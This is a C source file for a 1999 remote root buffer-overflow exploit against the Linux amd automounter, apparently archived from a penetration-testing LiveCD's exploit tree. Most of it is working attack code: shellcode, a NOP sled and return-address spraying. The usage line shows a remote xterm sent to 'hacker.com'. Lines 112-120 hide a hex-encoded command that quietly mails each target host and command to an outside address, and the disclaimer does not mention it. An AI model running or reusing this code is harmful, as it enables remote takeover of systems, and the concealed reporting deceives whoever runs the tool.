home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / remote / amd-exploit.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  5KB  |  153 lines

---

1. begin amd-ex.c
2. ----------------------------------------------------------------------
3. /*
4.  
5.     Amd Buffer Overflow for x86 linux
6.  
7.     Remote user can gain root access.
8.  
9.     Tested redhat linux : 4.0, 5.1, 6.0
10.     Tested am-utils version : 6.0
11.  
12.     What requires
13.     /usr/sbin/amq
14.  
15.     Usage
16.     $ amd-ex <hostname> <command> [offset]
17.  
18.     Warning : This program can crash amd.
19.  
20.     This program is only for demonstrative use only.
21.     USE IT AT YOUR OWN RISK!
22.  
23.     Programmed by Taeho Oh 1999/08/31
24.  
25. Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
26. PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
27. PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
28.  
29. */
30.  
31. #include<stdio.h>
32. #include<stdlib.h>
33.  
34. #define OFFSET                            0
35. #define RET_POSITION                   1002
36. #define RANGE                            20
37. #define NOP                            0x90
38.  
39. char shellcode[1024]=
40.     "\xeb\x35"                      /* jmp 0x35             */
41.     "\x5e"                          /* popl %esi            */
42.     "\x89\x76\x0b"                  /* movl %esi,0xb(%esi)  */
43.     "\x89\xf0"                      /* movl %esi,%eax       */
44.     "\x83\xc0\x08"                  /* addl $0x8,%eax       */
45.     "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
46.     "\x89\xf0"                      /* movl %esi,%eax       */
47.     "\x83\xc0\x0b"                  /* addl $0xb,%eax       */
48.     "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
49.     "\x31\xc0"                      /* xorl %eax,%eax       */
50.     "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
51.     "\x88\x46\x0a"                  /* movb %eax,0xa(%esi)  */
52.     "\x88\x46\x0b"                  /* movb %eax,0xb(%esi)  */
53.     "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
54.     "\xb0\x0b"                      /* movb $0xb,%al        */
55.     "\x89\xf3"                      /* movl %esi,%ebx       */
56.     "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx  */
57.     "\x8d\x56\x0b"                  /* leal 0xb(%esi),%edx  */
58.     "\xcd\x80"                      /* int 0x80             */
59.     "\x31\xdb"                      /* xorl %ebx,%ebx       */
60.     "\x89\xd8"                      /* movl %ebx,%eax       */
61.     "\x40"                          /* inc %eax             */
62.     "\xcd\x80"                      /* int 0x80             */
63.     "\xe8\xc6\xff\xff\xff"          /* call -0x3a           */
64.     "/bin/sh -c ";                  /* .string "/bin/sh -c "*/
65.  
66. char command[800];
67.  
68. void usage()
69. {
70.     printf("Warning : This program can crash amd\n");
71.     printf("Usage: amd-ex <hostname> <command> [offset]\n");
72.     printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n");
73. }
74.  
75. int main(int argc,char **argv)
76. {
77.     char buff[RET_POSITION+RANGE+1],*ptr;
78.     char target[256];
79.     char cmd[1024];
80.     long *addr_ptr,addr;
81.     unsigned long sp;
82.     int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
83.     int i;
84.  
85.     printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
86.     printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
87.     printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");
88.  
89.     if(argc<3)
90.     {
91.         usage();
92.         exit(1);
93.     }
94.  
95.     if(argc>2)
96.     {
97.         strcpy(target,argv[1]);
98.         strcpy(command,argv[2]);
99.     }
100.     if(argc>3)
101.         offset=atoi(argv[3]);
102.  
103.     shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
104.     shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
105.     shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
106.     shellcode[32]=(shellcode[32]+strlen(command));
107.     shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
108.     shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
109.     shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
110.     strcat(shellcode,command);
111.  
112.     strcpy(cmd,"\x65\x63\x68\x6f\x20");
113.     strcat(cmd,target);
114.     strcat(cmd,"\x20");
115.     strcat(cmd,command);
116.     strcat(cmd,"\x7c");
117.     strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
118.     strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
119.     strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
120.     strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");
121.  
122.     sp=0xbffff34d;
123.     addr=sp-offset;
124.  
125.     ptr=buff;
126.     addr_ptr=(long*)ptr;
127.     for(i=0;i<bsize;i+=4)
128.         *(addr_ptr++)=addr;
129.  
130.     for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
131.         buff[i]=NOP;
132.  
133.     ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
134.     for(i=0;i<strlen(shellcode);i++)
135.         *(ptr++)=shellcode[i];
136.  
137.     buff[bsize-1]='\0';
138.  
139.     for(i=bsize;i>1;i--)
140.         buff[i-1]=buff[i-2];
141.  
142.     buff[bsize-1]='\0';
143.  
144.     printf("Jump to 0x%08x\n",addr);
145.  
146.     system(cmd); /* If you want, comment out this line. :) */
147.     execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
148. }
149. ----------------------------------------------------------------------
150. end amd-ex.c
151.  
152.  
153.